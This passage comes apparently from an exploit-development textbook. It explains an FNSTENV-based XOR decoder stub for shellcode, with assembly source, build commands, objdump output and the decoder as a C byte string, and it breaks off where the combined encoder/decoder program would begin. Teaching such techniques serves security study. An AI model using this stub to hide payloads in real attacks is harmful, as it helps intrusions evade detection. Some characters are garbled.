dump FPU environ. record at ESP-12
pop edx ;3. pop eip of fabs FPU instruction to edx
add dl, 00 ;4. offset from fabs -> xor buffer
(placeholder)
short_xor_beg:
xor ecx,ecx ;5. clear ecx to use for loop
mov cl, 0x18 ;6. size of xor'd payload
short_xor_xor:
xor byte [edx], 0x00 ;7. the byte to xor with (key placeholder)
inc edx ;8. increment EDX to next byte
loop short_xor_xor ;9. loop through all of shellcode
shellcode:
; the decoded shellcode goes here.
Once we obtain the location of FABS (line 3 preceding), we have to adjust it to point to
the beginning of the decoded shellcode. Now let??™s assemble, link, and dump the
opcodes of the decoder.
BT book # nasm -f elf fnstenv.asm
BT book # ld -o fnstenv fnstenv.o
BT book # objdump -d ./fnstenv
./fnstenv2: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: d9 e1 fabs
8048082: d9 74 24 f4 fnstenv 0xfffffff4(%esp)
8048086: 5a pop %edx
8048087: 80 c2 00 add $0x0,%dl
0804808a
:
804808a: 31 c9 xor %ecx,%ecx
804808c: b1 18 mov $0x18,%cl
0804808e :
804808e: 80 32 00 xorb $0x0,(%edx)
8048091: 42 inc %edx
8048092: e2 fa loop 804808e
BT book #
Our FNSTENV decoder can be represented in binary as follows:
char decoder[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x00\x31"
"\xc9\xb1\x18\x80\x32\x00\x42\xe2\xfa";
Putting It All Together
We will now put it together and build a FNSTENV encoder and decoder test program.
Pages:
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444